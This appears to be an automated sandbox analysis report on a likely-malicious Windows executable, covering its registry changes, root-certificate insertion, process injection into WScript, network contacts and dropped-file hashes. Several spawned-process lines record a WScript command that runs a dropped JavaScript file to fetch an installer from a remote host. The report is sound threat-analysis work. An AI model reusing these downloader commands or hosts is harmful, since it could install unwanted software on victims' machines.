Malware Analysis Report

2025-06-16 07:32

Sample ID 240601-yyweesee28
Target 8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118
SHA256 29dabe35f9152188abfde68ee58856d47a421c7d7bda87ff68c5bf5f692d00df
Tags: execution
Score: 8/10


Analysis Overview

Score: 8/10

SHA256

29dabe35f9152188abfde68ee58856d47a421c7d7bda87ff68c5bf5f692d00df

Threat Level: Likely malicious

The file 8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Unsigned PE

Program crash

Modifies system certificate store

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 20:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 20:12

Reported

2024-06-01 20:14

Platform

win7-20231129-en

Max time kernel

118s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe"

Signatures

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = [binary certificate blob; hex data removed] C:\Windows\SysWOW64\WScript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C C:\Windows\SysWOW64\WScript.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2028 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 2028 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 2028 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 2028 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 460

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 3.140.13.188:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
US 104.26.6.37:443 www.hugedomains.com tcp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
US 3.140.13.188:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.140.13.188:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.140.13.188:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.140.13.188:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\fuf722.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\X531EG1G.txt

MD5 093d20442d381bf025090c64946fb944
SHA1 399789198c7745cfd5eafff4c2d6f9e54b587ff1
SHA256 1160fbf4429c0ae348f5d99211f113122cd8028fe4ba0d7146f4cb3b93c7c412
SHA512 5b2397436e554f2a93b807edb75690e0360ee7a56c672f2dfca632902067998d6a36f8711b2071b5c27d14fc6fd2e18e45c80ae1a25c9832c1b70ee24b52f23f

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1J224M4\domain_profile[1].htm

MD5 6e2125138c3caf153ea4f9637c965e0f
SHA1 1477d0eed82b4dc4c6bdfa516bafb0b0607890de
SHA256 2e79dd13e68730ee3ad9928968e347d01367e6e3173d190cedf01869483a5d87
SHA512 4771348e79ef76d9e70f003f7b384735fc83b1541858fd9af0a00d516787e6d0a1ce719f6424756d9ce7aabe158aa4edd27e2965031420c234250f3be3aab221

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 064e0d148a9c6dc31553d5853fe701ef
SHA1 b83ef46a854fe5fea917a340ebb2099b0ad4ac0b
SHA256 bee03cb21bd4c4040d379657f7ea8c53a8a66b20113090ff97bb86adf8928ded
SHA512 3b6fd108929b7ea78ed19c63ee25bb8fb4f370dac29ff73dfdea4fea4ebd19255b52313b49ac1d1f3d891641bf91eb3eb1ec50103eb472a8a007a9aee9637dc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 371e0e8ad5bf71ee0415bc0ef2810f46
SHA1 5a7652aba6165d8606e4fa290d4933499efdfc9d
SHA256 5e68fdc9ff581251f352de874c3b1ef18d22cc0f38684d368d22ac2e8a0d0a0f
SHA512 754705c70d40b44af8feffb04b6b390729010280c92e27877b3e78aed95d16b874b0f514f039fb7e66f82f0251b254ff004261ec367f750068fd88d8488c422c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 367be39f0f0bd10ee528276085ebdf48
SHA1 bd2d8f3b91e3d0e5dcca4c0734f27ca4b0f257ce
SHA256 6568d4a4c638ae3fec4d5bef16d7f5378195466005a7d7de3667b501878e566c
SHA512 1e33cbeabbf89c1d5f5320be70459a27b2b4fdbbb4e5bd8fdcd4f4dea5b5b7761e49ca4cc72dd0a33423e4ce15353495eeef01472c7cb005c9d9dd4ea9d4a606

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 e1c83e43bce6f1e2d63dedd5fb5b737a
SHA1 c4f7f6ddd762622d230f79a785495e0904d2e9a1
SHA256 fb1bb667f8eef8ae1528418dfe84eacad9cf01f4ab3da365c6aedd3e07af8bea
SHA512 4b3a6056093a3c2352def199044d8fc1ee85dafd01b07486a83a3be4240d317b8804ebe7471ab8d9aaeedf2d748720255ead65c7ef1cf7b069c268a4838a5b79

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 fb3d4c03f0410c33373834b0836fab05
SHA1 a31b7e36de6b7794bff6ed26e86f4e2957d94fa2
SHA256 e3cf3f79ad0e1cb98e344cdd265c11ee55f5c77864629b5a4243d8f3071c6160
SHA512 eccaebcb4fa20fae1f2bf56700eb3e1501945b76c307bf28944518ce7b227d388337fa098ada95c080699f4641cfc6693cbbd42dc2d943a426633b470baa5e2a

C:\Users\Admin\AppData\Local\Temp\Tar369B.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L47MRCGC\domain_profile[1].htm

MD5 85ac5b0c1d4e9718f7041eefbd088ca6
SHA1 45d9405296a830719795c41b0c28381d69d4f00e
SHA256 23fe0d3946aae3cba28758c331b913d7de8441aa8e3b1459a1f3e55975c51570
SHA512 1f2e03ccabcda8d07d26df0bbb6cef9b65d6a8eb00ade2122d76bef5a0f815806601f8d191fd5a500b0eaac2eaf12510660106a94cdfbfdb8072b9b2010a3a96

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1J224M4\domain_profile[1].htm

MD5 f69723107188c758ac327cd3078490f0
SHA1 774a1619b4bf70cbeed19552f80fcf66d5a7d25c
SHA256 75b1a27866addae0e781f50167f35627e26b7a49e589dea304d8e67ae672c7c1
SHA512 7764b9f19fdc41fcf76e80b83dfbb5b83e2dcec64bde8bba1ee69f2471f5d8105d87f11b283c62e4e833922ad789a052c091c94677859f9a95bdf1063cbed9dc

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L47MRCGC\domain_profile[1].htm

MD5 ba02e5bc1cc86e37fc860aa61f722e56
SHA1 03809938564fb66fd1e74bfb030d645827ddd124
SHA256 dc078c167cdd340aa294b8828e477d805f49511890d3cd1d94711108be0cfc81
SHA512 c5df39dfa63ca24fe7571c01101a69cf1716f8fff60406f2bf55b8da2bbcac32978bc21c75088a08f4803b9fe2e0fbc7b9b87b5004ffb3f5da7210e98e53b0b0

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 20:12

Reported

2024-06-01 20:14

Platform

win10v2004-20240426-en

Max time kernel

93s

Max time network

94s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4344 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3558.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf3558.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3558.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf3558.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3558.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf3558.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3558.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf3558.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3558.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf3558.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4344 -ip 4344

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 1460

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 3.130.253.23:80 bi.downthat.com tcp
US 8.8.8.8:53 23.253.130.3.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 3.130.204.160:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
US 8.8.8.8:53 160.204.130.3.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 3.130.204.160:80 bi.downthat.com tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 3.130.204.160:80 bi.downthat.com tcp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 3.130.253.23:80 bi.downthat.com tcp
US 8.8.8.8:53 98.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\fuf3558.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76